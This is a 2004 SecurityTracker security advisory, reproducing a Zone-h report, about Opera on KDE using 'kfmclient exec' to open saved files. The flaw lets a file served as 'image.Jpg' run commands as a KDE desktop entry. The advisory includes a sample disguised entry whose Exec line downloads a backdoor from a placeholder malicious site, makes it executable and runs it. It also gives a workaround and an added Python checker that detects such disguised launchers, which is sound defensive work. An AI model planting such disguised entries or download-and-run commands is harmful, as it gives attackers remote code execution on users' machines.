SecurityTracker.com
Category:   Application (Web Browser)  >   Opera
Vendors:   Opera Software
Opera Default 'kfmclient exec' Configuration May Let Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1012491
SecurityTracker URL:  http://securitytracker.com/id/1012491
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Dec 13 2004
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): Tested on Opera 7.54 on Linux with KDE 3.2.3
Description:   A vulnerability was reported in Opera when using KDE. A remote user may be able to cause the target user to execute arbitrary commands.

Giovanni Delvecchio of Zone-h reported that KDE uses 'kfmclient exec' as the default application for processing saved files. A remote user can cause arbitrary shell commands to be executed on the target system.

For example, a remote server can supply 'image.Jpg' with an unknown Content-Type field, causing Opera to display a dialog box for the file. If the target user selects 'Open' to view the supposed image file, the file will be opened using 'kfmclient exec'. If 'image.Jpg' is a KDE desktop entry, then the target user's system will execute the command in the 'Exec' entry.

The original advisory is available at:

http://www.zone-h.org/advisories/read/id=6503

Impact:   A remote user may be able to cause arbitrary commands to be executed on the target user's system with some user interaction.
Solution:   No vendor solution was available at the time of this entry.

The report indicates that as a workaround, you can disable 'kfmclient exec' as the default application.

Vendor URL:  www.opera.com/
Cause:   Configuration error, Input validation error, State error
Underlying OS:  Linux (Any)

Message History:   None.


 Source Message Contents

Subject:  [ZH2004-19SA] Possible execution of remote shell commands in Opera with kfmclien


Author: Giovanni Delvecchio
e-mail: badpenguin@zone-h.org

Original Advisory: http://www.zone-h.org/advisories/read/id=6503

Tested version:
Opera 7.54 Linux version with KDE 3.2.3



Problem:
=======
Opera for Linux uses "kfmclient exec" as "Default Application" to handle
saved files.
This could be used by malicious remote users to execute arbitrary shell
commands on a target system.
Indeed, the command "kfmclient exec" could be used to open a "KDE Desktop
Entry" and therefore execute the command within the "Exec=" entry.

Example of [KDE Desktop Entry]:

________________________________

# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec="Any arbitrary command"
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0
______________________________


Possible method of Exploitation
=========================

This method of exploitation requires that a particular file name extension
be used.
If page.Htm is used as the file name and "kfmclient exec page.Htm" is opened,
the command in the "Exec=" entry will be executed.
If instead "page.htm" is used as the file name, it will not be opened as a
"KDE desktop entry" but will be viewed in Konqueror.
It also works with Jpg, Gif, etc., but not with the jpg, gif, ... extensions, since
the "system" is case sensitive.

Attack scenario:

1- A user clicks on a link which requires http://malicious_server/image.Jpg

2- malicious_server responds with an unknown Content-Type field, for
example Content-Type: image/Jpeg. (note the dot at the end), so Opera will
show a dialog window.

3- If a user chooses "Open" to view image.Jpg, it will be opened by the
"kfmclient exec" command, since kfmclient is the "Default Application".

4- Image.Jpg is a KDE desktop entry:

--------image.Jpg----------

# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c 
wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0

---- end of image.Jpg-------

Note: \t is a horizontal tab.
In this case a backdoor will be downloaded onto the victim's computer and
executed.



Solution:
========
Disable "kfmclient exec" as default application

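A defensive check for the condition the advisory describes, as an added example that is not part of the original advisory and is not Opera or KDE code: it inspects a downloaded file's content and reports when a file named like an image or web page is really a desktop entry with a non-empty Exec line. The function names, the extension allow-list and the sample bytes are assumptions constructed for this example; it also accepts the freedesktop.org `[Desktop Entry]` header, which goes beyond the single header shown in the advisory.

```python
# Group headers that mark a launcher file: the legacy KDE header shown in the
# advisory and the freedesktop.org header used by later desktop environments.
LAUNCHER_HEADERS = {"[kde desktop entry]", "[desktop entry]"}
# Extensions under which a launcher is expected (assumption for this example).
LAUNCHER_EXTENSIONS = {".desktop", ".kdelnk"}

# Constructed sample: a harmless launcher body to be saved under an image name.
SAMPLE_ENTRY = (b"# KDE Config File\n[KDE Desktop Entry]\n"
                b"Exec=/usr/bin/true\nType=Application\nTerminal=0\n")


def parse_launcher(data: bytes):
    """Return the key/value pairs of the launcher group, or None when the
    content does not begin with a launcher group header."""
    text = data.decode("utf-8", errors="replace")
    entries, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                    # skip blank lines and comments
        if line.startswith("["):
            if in_group:
                break                   # a second group ends the launcher group
            if line.lower() not in LAUNCHER_HEADERS:
                return None             # first group is something else
            in_group = True
        elif not in_group:
            return None                 # data before any group: not a launcher
        elif "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip()] = value.strip()
    return entries if in_group else None


def check_download(filename: str, data: bytes):
    """Return a finding when a file named like ordinary content is really a
    launcher with a non-empty Exec entry; otherwise return None."""
    dot = filename.rfind(".")
    ext = filename[dot:].lower() if dot != -1 else ""
    entries = parse_launcher(data)
    if entries is None or ext in LAUNCHER_EXTENSIONS:
        return None
    command = entries.get("Exec", "")
    if not command:
        return None
    return {"file": filename, "claimed_ext": ext, "exec": command}
```

The check looks only at content, so it gives the same answer for image.Jpg and image.jpg and can run on a download directory before any handler opens the file.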

 
 



Copyright 2019, SecurityGlobal.net LLC